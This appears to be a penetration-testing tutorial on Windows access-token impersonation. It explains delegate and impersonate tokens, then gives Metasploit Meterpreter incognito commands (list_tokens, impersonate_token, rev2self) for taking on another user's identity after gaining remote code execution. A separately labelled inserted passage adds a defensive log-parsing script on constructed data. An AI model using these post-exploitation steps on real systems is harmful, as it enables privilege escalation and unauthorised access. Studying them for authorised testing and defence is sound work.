# Token impersonation

Windows access tokens are integral to Microsoft's authentication, access control and single sign-on (SSO) model; they are created and managed by the Local Security Authority Subsystem Service (LSASS). They are temporary keys that let you access the system and network without having to provide credentials each time you access a file.\
There are two types of tokens: delegate and impersonate:

* Delegate tokens are created for ‘interactive’ logons, such as logging into the machine or connecting to it via Remote Desktop.
* Impersonate tokens are for ‘non-interactive’ sessions, such as attaching a network drive or a domain logon script.

The other great thing about tokens? They persist until a reboot. When a user logs off, their delegate token is reported as an impersonate token, but it still holds all of the rights of a delegate token.

* TIP: File servers are virtual treasure troves of tokens, since most file servers are used as network-attached drives via domain logon scripts.
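As an added, defender-side example that is not part of the original page: the script below walks a constructed key=value export of Windows logon events (4624 logon, 4634 logoff, and 6005 "event log service started" used as a reboot marker; the line format is assumed, not a real log layout) and reports which privileged accounts still have a token resident on each host. It applies the rules above: interactive logon types 2 and 10 are assumed to leave a delegate token, network logon type 3 an impersonate token, a logoff does not clear the token, and a reboot does.

```python
import re
from collections import defaultdict

# Interactive logons (2, 10) leave a delegate token on the host; network logons
# (3: mapped drives, logon scripts) leave only an impersonate token (assumed).
TOKEN_BY_LOGON_TYPE = {2: "delegate", 10: "delegate", 3: "impersonate"}

# Constructed sample export (not real event log output); one event per line
SAMPLE_EVENTS = """\
EventID=4624 Host=FS01 User=CORP\\admin.jane LogonType=10
EventID=4624 Host=FS01 User=CORP\\bob LogonType=3
EventID=4634 Host=FS01 User=CORP\\admin.jane
EventID=4624 Host=WS07 User=CORP\\admin.jane LogonType=2
EventID=6005 Host=WS07
EventID=4624 Host=FS02 User=CORP\\admin.tom LogonType=3
"""

LINE_RE = re.compile(
    r"EventID=(?P<id>\d+)\s+Host=(?P<host>\S+)"
    r"(?:\s+User=(?P<user>\S+))?(?:\s+LogonType=(?P<lt>\d+))?"
)

def parse_events(text):
    """Yield (event_id, host, user, logon_type) from the key=value export."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m["id"]), m["host"], m["user"], (
                int(m["lt"]) if m["lt"] else None)

def exposed_tokens(text, privileged):
    """Map host -> user -> token info for privileged accounts whose token is
    still resident: a 4634 logoff keeps the entry (delegate rights survive, it
    is merely reported as impersonate); only a boot (6005) clears the host."""
    exposure = defaultdict(dict)
    for event_id, host, user, logon_type in parse_events(text):
        if event_id == 6005:                      # reboot wipes all tokens
            exposure.pop(host, None)
        elif user not in privileged:              # unprivileged: ignore
            continue
        elif event_id == 4624 and logon_type in TOKEN_BY_LOGON_TYPE:
            exposure[host][user] = {"token": TOKEN_BY_LOGON_TYPE[logon_type],
                                    "logged_off": False}
        elif event_id == 4634 and user in exposure.get(host, {}):
            exposure[host][user]["logged_off"] = True
    return dict(exposure)

if __name__ == "__main__":
    ADMINS = {"CORP\\admin.jane", "CORP\\admin.tom"}   # constructed list
    print(exposed_tokens(SAMPLE_EVENTS, ADMINS))
```

On the sample data FS01 still carries admin.jane's delegate token even though she logged off, WS07 is clean because it rebooted, and FS02 only exposes an impersonate token from admin.tom's network logon.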

You can impersonate valid tokens on the system and become that specific user without ever having to worry about credentials, or for that matter, even hashes. During a penetration test this is especially useful because tokens may allow local and/or domain privilege escalation, giving you alternate avenues with potentially elevated privileges to multiple systems.

Now on to the attack: fire up Metasploit and get RCE on your victim (using, for example, psexec). Once you have a Meterpreter session, load a tool called incognito:

```
meterpreter > load incognito
meterpreter > list_tokens -u
```

Find the user you want to impersonate and run:

```
impersonate_token domain\\user
```

Now when you drop into a shell (type `shell`) and run `whoami`, you should see that you're impersonating the user.

If you want to revert back to the user you came in as, type:

```
rev2self
```

